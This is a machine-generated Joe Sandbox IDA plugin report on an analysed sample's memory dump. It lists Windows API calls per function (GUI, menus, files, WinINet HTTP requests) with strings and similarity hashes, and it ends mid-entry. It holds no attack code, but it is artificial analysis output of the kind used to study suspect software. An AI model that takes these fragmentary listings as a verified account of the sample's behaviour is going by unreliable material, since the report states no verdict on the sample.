                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C85A40
                                                                      • SetWindowTextW.USER32(?,?), ref: 00C85A57
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00C85A6C
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00C85A72
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00C85A82
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00C85A88
                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C85AA9
                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C85AC3
                                                                      • GetWindowRect.USER32(?,?), ref: 00C85ACC
                                                                      • _wcslen.LIBCMT ref: 00C85B33
                                                                      • SetWindowTextW.USER32(?,?), ref: 00C85B6F
                                                                      • GetDesktopWindow.USER32 ref: 00C85B75
                                                                      • GetWindowRect.USER32(00000000), ref: 00C85B7C
                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C85BD3
                                                                      • GetClientRect.USER32(?,?), ref: 00C85BE0
                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00C85C05
                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C85C2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                      • String ID:
                                                                      • API String ID: 895679908-0
                                                                      • Opcode ID: 38d9bde30aee976cd693cb6ba673956108913a5f5f4eaa778e06a513b10334f1
                                                                      • Instruction ID: 4ec441390a1a65f93575b8df882b3f439ab5b3717f413c284ad8ebb7ff0f6b9a
                                                                      • Opcode Fuzzy Hash: 38d9bde30aee976cd693cb6ba673956108913a5f5f4eaa778e06a513b10334f1
                                                                      • Instruction Fuzzy Hash: E2716E31900B05AFDB20EFA9CE85FAEBBF5FF48708F104618E552A25A0D7B5E944CB54
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                      • API String ID: 176396367-1603158881
                                                                      • Opcode ID: 74382f99938ee55919c7b9d8d8130859ceb3945a64ce1f8ad067404851304f3c
                                                                      • Instruction ID: 418567503c22e9dda550c5e80cff4974daf12772c414a0dacd3cca091f4c586e
                                                                      • Opcode Fuzzy Hash: 74382f99938ee55919c7b9d8d8130859ceb3945a64ce1f8ad067404851304f3c
                                                                      • Instruction Fuzzy Hash: 84E11731A00696ABCF18AF78C8517EDFBB0BF54B18F149129E466B7240DB30AF859794
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(00000000,00000000,00CBCC08), ref: 00C94527
                                                                      • _wcslen.LIBCMT ref: 00C9453B
                                                                      • _wcslen.LIBCMT ref: 00C94599
                                                                      • _wcslen.LIBCMT ref: 00C945F4
                                                                      • _wcslen.LIBCMT ref: 00C9463F
                                                                      • _wcslen.LIBCMT ref: 00C946A7
                                                                        • Part of subcall function 00C3F9F2: _wcslen.LIBCMT ref: 00C3F9FD
                                                                      • GetDriveTypeW.KERNEL32(?,00CE6BF0,00000061), ref: 00C94743
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                      • API String ID: 2055661098-1000479233
                                                                      • Opcode ID: 580fa991132b67cce662b53ee5b8e9c29af899da2e6e691cf8a368f0048c6678
                                                                      • Instruction ID: b74bef0c27bb746c59c4da241310d4fc2f50b1694257bd69b7681bacbb6990cb
                                                                      • Opcode Fuzzy Hash: 580fa991132b67cce662b53ee5b8e9c29af899da2e6e691cf8a368f0048c6678
                                                                      • Instruction Fuzzy Hash: 1CB134716083029FCB18DF28C894E6EB7E5BFA5760F10491DF0A6C7291D730DA46CBA2
                                                                      APIs
                                                                      • GetMenuItemCount.USER32(00CF1990), ref: 00C62F8D
                                                                      • GetMenuItemCount.USER32(00CF1990), ref: 00C6303D
                                                                      • GetCursorPos.USER32(?), ref: 00C63081
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00C6308A
                                                                      • TrackPopupMenuEx.USER32(00CF1990,00000000,?,00000000,00000000,00000000), ref: 00C6309D
                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C630A9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                      • String ID: 0
                                                                      • API String ID: 36266755-4108050209
                                                                      • Opcode ID: 256c3580ad151764b7d078a26811731391f179e48d99109372cabba6cd515709
                                                                      • Instruction ID: b5f4355b998ac3f9727d7046f4ab989f57a8699fa8acc1db8075b197c358cb07
                                                                      • Opcode Fuzzy Hash: 256c3580ad151764b7d078a26811731391f179e48d99109372cabba6cd515709
                                                                      • Instruction Fuzzy Hash: 7F713A30640656BEEB319F65DCC9FAABF69FF04324F200216F5246A1E1C7B1AE14D751
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?), ref: 00CB6DEB
                                                                        • Part of subcall function 00C26B57: _wcslen.LIBCMT ref: 00C26B6A
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CB6E5F
                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CB6E81
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CB6E94
                                                                      • DestroyWindow.USER32(?), ref: 00CB6EB5
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C20000,00000000), ref: 00CB6EE4
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CB6EFD
                                                                      • GetDesktopWindow.USER32 ref: 00CB6F16
                                                                      • GetWindowRect.USER32(00000000), ref: 00CB6F1D
                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CB6F35
                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CB6F4D
                                                                        • Part of subcall function 00C39944: GetWindowLongW.USER32(?,000000EB), ref: 00C39952
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                      • String ID: 0$tooltips_class32
                                                                      • API String ID: 2429346358-3619404913
                                                                      • Opcode ID: b17c0806ab0aca397e542d5d007c13d3b19de138c71c44c9c0d97779a05b2c46
                                                                      • Instruction ID: 521a7cc510dc17704c36d3b56075bbfcb2c7aeae782f3367723b5034012c1ffa
                                                                      • Opcode Fuzzy Hash: b17c0806ab0aca397e542d5d007c13d3b19de138c71c44c9c0d97779a05b2c46
                                                                      • Instruction Fuzzy Hash: 01716575504284AFDB21CF68D888FBABBE9EB89304F08051DF99997261C774EA05DB12
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00CB9147
                                                                        • Part of subcall function 00CB7674: ClientToScreen.USER32(?,?), ref: 00CB769A
                                                                        • Part of subcall function 00CB7674: GetWindowRect.USER32(?,?), ref: 00CB7710
                                                                        • Part of subcall function 00CB7674: PtInRect.USER32(?,?,00CB8B89), ref: 00CB7720
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00CB91B0
                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CB91BB
                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CB91DE
                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CB9225
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00CB923E
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00CB9255
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00CB9277
                                                                      • DragFinish.SHELL32(?), ref: 00CB927E
                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00CB9371
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                      • API String ID: 221274066-3440237614
                                                                      • Opcode ID: 663d08c32b158767ea6cb1fb6676705f0afc1dd2de7d668c74911ebcafa36049
                                                                      • Instruction ID: 4b8e4a0a60e5eee8c7dab1de0c9a4d9b1ff37034336facebacd97d713e5f21b5
                                                                      • Opcode Fuzzy Hash: 663d08c32b158767ea6cb1fb6676705f0afc1dd2de7d668c74911ebcafa36049
                                                                      • Instruction Fuzzy Hash: 03615C71108301AFD701DF64DC85EAFBBE8EF99750F000A2DF595931A1DB709A49DB52
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C9C4B0
                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C9C4C3
                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C9C4D7
                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C9C4F0
                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C9C533
                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C9C549
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C9C554
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C9C584
                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C9C5DC
                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C9C5F0
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00C9C5FB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                      • String ID:
                                                                      • API String ID: 3800310941-3916222277
                                                                      • Opcode ID: 94c8973795cfbd06fb02c4685ae392dd25a850c56b24b8124b071a5c431075d2
                                                                      • Instruction ID: d4b462e46767f5a2243277ed4331e0d5de7c98368ed0219a89f1acaf4e69d41c
                                                                      • Opcode Fuzzy Hash: 94c8973795cfbd06fb02c4685ae392dd25a850c56b24b8124b071a5c431075d2
                                                                      • Instruction Fuzzy Hash: 895129B1600608BFEB219F65C9C8BBB7BFCFB08754F004519F956D6250DB34EA44AB61
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00CB8592
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CB85A2
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CB85AD
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CB85BA
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00CB85C8
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CB85D7
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00CB85E0
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CB85E7
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CB85F8
                                                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00CBFC38,?), ref: 00CB8611
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00CB8621
                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00CB8641
                                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00CB8671
                                                                      • DeleteObject.GDI32(?), ref: 00CB8699
                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CB86AF
                                                                      Similarity
                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3840717409-0
                                                                      • Opcode ID: 1fea1aee250b5ae3dd23b6120a55a55a4b3e71205f552110173114745fb88d5d
                                                                      • Instruction ID: 2b8de416996de828d150d9e47eb9d5cf8278d487819d0dd5b6f8d2d1164d646b
                                                                      • Opcode Fuzzy Hash: 1fea1aee250b5ae3dd23b6120a55a55a4b3e71205f552110173114745fb88d5d
                                                                      • Instruction Fuzzy Hash: 98410975600205AFDB119FA5DC88FAE7BBCEF89B11F104159F915E7260DB709A05CB60
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(00000000), ref: 00C91502
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00C9150B
                                                                      • VariantClear.OLEAUT32(?), ref: 00C91517
                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C915FB
                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00C91657
                                                                      • VariantInit.OLEAUT32(?), ref: 00C91708
                                                                      • SysFreeString.OLEAUT32(?), ref: 00C9178C
                                                                      • VariantClear.OLEAUT32(?), ref: 00C917D8
                                                                      • VariantClear.OLEAUT32(?), ref: 00C917E7
                                                                      • VariantInit.OLEAUT32(00000000), ref: 00C91823
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                      • API String ID: 1234038744-3931177956
                                                                      • Opcode ID: a15f447b4b519d1c6dd953a3608a2e197ae55454f3615692f72e8623fb1b3437
                                                                      • Instruction ID: da466ba107a1c18f1dd2c70a2903df38b0f8eb784b8f2cc7c59c8cfd2896d783
                                                                      • Opcode Fuzzy Hash: a15f447b4b519d1c6dd953a3608a2e197ae55454f3615692f72e8623fb1b3437
                                                                      • Instruction Fuzzy Hash: 77D10531A00116DBDF009F66D88EB7DB7B5BF44700F1A845AF846ABA90DB30DD42EB61
                                                                      APIs
                                                                      • ___free_lconv_mon.LIBCMT ref: 00C5DAA1
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D659
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D66B
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D67D
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D68F
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D6A1
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D6B3
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D6C5
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D6D7
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D6E9
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D6FB
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D70D
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D71F
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D731
                                                                      • _free.LIBCMT ref: 00C5DA96
                                                                        • Part of subcall function 00C529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000), ref: 00C529DE
                                                                        • Part of subcall function 00C529C8: GetLastError.KERNEL32(00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000,00000000), ref: 00C529F0
                                                                      • _free.LIBCMT ref: 00C5DAB8
                                                                      • _free.LIBCMT ref: 00C5DACD
                                                                      • _free.LIBCMT ref: 00C5DAD8
                                                                      • _free.LIBCMT ref: 00C5DAFA
                                                                      • _free.LIBCMT ref: 00C5DB0D
                                                                      • _free.LIBCMT ref: 00C5DB1B
                                                                      • _free.LIBCMT ref: 00C5DB26
                                                                      • _free.LIBCMT ref: 00C5DB5E
                                                                      • _free.LIBCMT ref: 00C5DB65
                                                                      • _free.LIBCMT ref: 00C5DB82
                                                                      • _free.LIBCMT ref: 00C5DB9A
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                      • String ID:
                                                                      • API String ID: 161543041-0
                                                                      • Opcode ID: 12e6638aabe8b724da97c46a5a956aaf6a6aea27cbc480688573a489686c5d65
                                                                      • Instruction ID: 98bf967c841a294ae68ad0f7e3d3cfc61be9c9ff64cd0948d4a82f0e9ff190af
                                                                      • Opcode Fuzzy Hash: 12e6638aabe8b724da97c46a5a956aaf6a6aea27cbc480688573a489686c5d65
                                                                      • Instruction Fuzzy Hash: 83316F396043049FDB31AA39E845B9677E9FF11312F114419F86AE7291DF31ADC8E728
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00C8369C
                                                                      • _wcslen.LIBCMT ref: 00C836A7
                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C83797
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C8380C
                                                                      • GetDlgCtrlID.USER32(?), ref: 00C8385D
                                                                      • GetWindowRect.USER32(?,?), ref: 00C83882
                                                                      • GetParent.USER32(?), ref: 00C838A0
                                                                      • ScreenToClient.USER32(00000000), ref: 00C838A7
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00C83921
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00C8395D
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                      • String ID: %s%u
                                                                      • API String ID: 4010501982-679674701
                                                                      • Opcode ID: 49c5855a136ae48770397d57f2a8ec48d98f1451519cca568c2b2bf43923066b
                                                                      • Instruction ID: 80e35009e4e4e7cbf2376e5048f4090f9feee18c43fed37c4fbd988a10a9bbf6
                                                                      • Opcode Fuzzy Hash: 49c5855a136ae48770397d57f2a8ec48d98f1451519cca568c2b2bf43923066b
                                                                      • Instruction Fuzzy Hash: 5C91E671204746AFD719EF24C885FAAF7A8FF44718F005629F9A9C2190DB30EB45CB95
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C84994
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00C849DA
                                                                      • _wcslen.LIBCMT ref: 00C849EB
                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00C849F7
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00C84A2C
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00C84A64
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00C84A9D
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00C84AE6
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C84B20
                                                                      • GetWindowRect.USER32(?,?), ref: 00C84B8B
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                      • String ID: ThumbnailClass
                                                                      • API String ID: 1311036022-1241985126
                                                                      • Opcode ID: 275f6ee072668a55df9646b6d2d8a28b3acf4570191b4fce7908947dc8c16830
                                                                      • Instruction ID: b31217c6463ee1b59dca2a95f5aa8b390f570e1d4a85be068b885f44fcf33fa5
                                                                      • Opcode Fuzzy Hash: 275f6ee072668a55df9646b6d2d8a28b3acf4570191b4fce7908947dc8c16830
                                                                      • Instruction Fuzzy Hash: 7291BF311042069FDB18EF14C985FBA77E8FF84318F04856AFD959A096EB30EE45CBA5
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CB8D5A
                                                                      • GetFocus.USER32 ref: 00CB8D6A
                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00CB8D75
                                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00CB8E1D
                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00CB8ECF
                                                                      • GetMenuItemCount.USER32(?), ref: 00CB8EEC
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00CB8EFC
                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00CB8F2E
                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00CB8F70
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CB8FA1
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                      • String ID: 0
                                                                      • API String ID: 1026556194-4108050209
                                                                      • Opcode ID: c5a26f549a10c12f6fa76bd171e9fb19621696e78924cedd366d73c1201a7831
                                                                      • Instruction ID: ee9bd0ab34af930ebbc613f079634e41d09c99a5dcafcf78a59df88cc3788266
                                                                      • Opcode Fuzzy Hash: c5a26f549a10c12f6fa76bd171e9fb19621696e78924cedd366d73c1201a7831
                                                                      • Instruction Fuzzy Hash: A381AF715083419FDB20CF24C884ABBBBEDFB88354F040A19F99497291DB70DA08DBA2
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(00CF1990,000000FF,00000000,00000030), ref: 00C8BFAC
                                                                      • SetMenuItemInfoW.USER32(00CF1990,00000004,00000000,00000030), ref: 00C8BFE1
                                                                      • Sleep.KERNEL32(000001F4), ref: 00C8BFF3
                                                                      • GetMenuItemCount.USER32(?), ref: 00C8C039
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00C8C056
                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00C8C082
                                                                      • GetMenuItemID.USER32(?,?), ref: 00C8C0C9
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C8C10F
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C8C124
                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C8C145
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                      • String ID: 0
                                                                      • API String ID: 1460738036-4108050209
                                                                      • Opcode ID: d38b6c70d1c0ebae3f2d5823e692e984e6eccaf3d654872d087e5cb4eddb90f5
                                                                      • Instruction ID: fc9072ffa612c28161d8a4a1c682797ecf97410ef8714b2828cb965910930373
                                                                      • Opcode Fuzzy Hash: d38b6c70d1c0ebae3f2d5823e692e984e6eccaf3d654872d087e5cb4eddb90f5
                                                                      • Instruction Fuzzy Hash: 92619FB090025AAFDF21EF64DCC8FAE7BB8EB05348F140115E921A3292C735AE44DB75
                                                                      APIs
                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C8DC20
                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C8DC46
                                                                      • _wcslen.LIBCMT ref: 00C8DC50
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00C8DCA0
                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C8DCBC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
